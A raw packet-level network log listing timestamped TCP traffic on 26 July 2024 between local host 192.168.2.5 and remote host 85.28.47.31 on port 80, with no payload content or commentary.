Jul 26, 2024 20:09:12.463529110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463540077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463560104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463568926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463577032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.463603973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.463654041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.467685938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.467737913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.467741966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.467752934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.467783928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.467807055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.467938900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.467994928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469002008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469053030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469078064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469090939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469127893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469139099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469153881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469170094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469185114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469186068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469228029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469420910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469435930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469470978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469491005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469520092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469535112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469548941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469561100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469573021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469608068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469634056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469664097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469665051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469677925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469692945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469693899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469712973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469736099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469774008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.469961882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469978094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.469993114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470006943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470016956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.470025063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470046043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470046997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.470061064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470076084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470091105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470099926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.470125914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.470145941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.470176935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470191956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470206976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470221043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.470227003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.470249891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.470282078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.546672106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.546690941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.546706915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.546797991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.546812057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.546825886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.546840906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.546855927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547004938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547004938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547108889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547123909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547138929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547154903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547161102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547172070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547195911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547223091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547391891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547406912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547422886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547437906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547456026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547483921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547488928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547499895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547529936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547568083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547749043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547764063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.547806978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.547996998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548012018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548048973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548085928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548122883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548137903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548177004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548419952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548438072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548449039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548459053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548469067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548472881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548522949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548527002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548569918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548643112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548652887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548662901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548674107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.548688889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548731089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.548999071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549009085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549019098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549029112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549040079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549051046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549060106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549096107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549278021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549288034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549299002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549309015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549318075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549329042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549333096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549340963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549370050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549396038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549766064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549774885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549784899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549794912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549804926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549815893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549833059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549873114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549896955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549906969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549915075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549923897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549933910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.549948931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.549977064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.553436995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553497076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.553519011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553529024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553569078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.553680897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553689957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553700924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553709984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553730965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.553761005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.553819895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553828955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553873062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.553889036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553900957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.553989887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554166079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554244041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554249048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554256916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554302931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554363012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554373980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554384947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554410934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554440975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554469109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554480076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554491997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554502964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554514885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554516077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554527044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554553032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554563999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554713964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554725885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554737091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554748058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554759979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554768085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554770947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554785013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554795027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.554807901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.554828882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.560705900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560719967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560730934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560792923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560803890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560815096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560821056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.560826063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560866117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.560959101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560971975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560977936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.560983896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561028957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561042070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561043978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.561074018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.561132908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561181068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.561296940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561312914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561322927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561333895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561352015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561362028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561373949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561387062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561395884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.561398029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561410904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561434984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.561460972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.561652899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561665058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561676025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561681986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.561738968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.637486935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637496948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637506008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637628078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637636900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637646914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637656927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637658119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.637703896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.637715101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.637880087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637890100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637900114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637908936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637919903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.637944937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.637965918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.638144016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638154984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638164997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638168097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638171911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638176918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638236046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.638427973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638437986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638448000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638458967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638494015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.638516903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.638670921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638681889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638691902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638701916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638734102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.638771057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.638894081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638905048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638914108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.638957977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.639055014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639065981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639132977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639143944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639153004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639157057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.639172077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639175892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639182091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639189959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.639225960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.639247894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.639595032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639605999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639611959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639616966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639621973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639627934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639806032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.639909029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639919043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639924049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639933109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639938116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639946938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.639976978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.640032053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.640191078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640248060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.640374899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640445948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640463114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640528917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640544891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640605927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.640625000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640640974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.640664101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.640702009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.644536018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644587994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644602060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644610882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.644637108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644658089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.644696951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.644831896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644845963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644860983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644939899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:12.644973040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644984961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.644989967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645015955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645025969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645035028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:12.645045042 CEST	80	49704	85.28.47.31	192.168.2.5
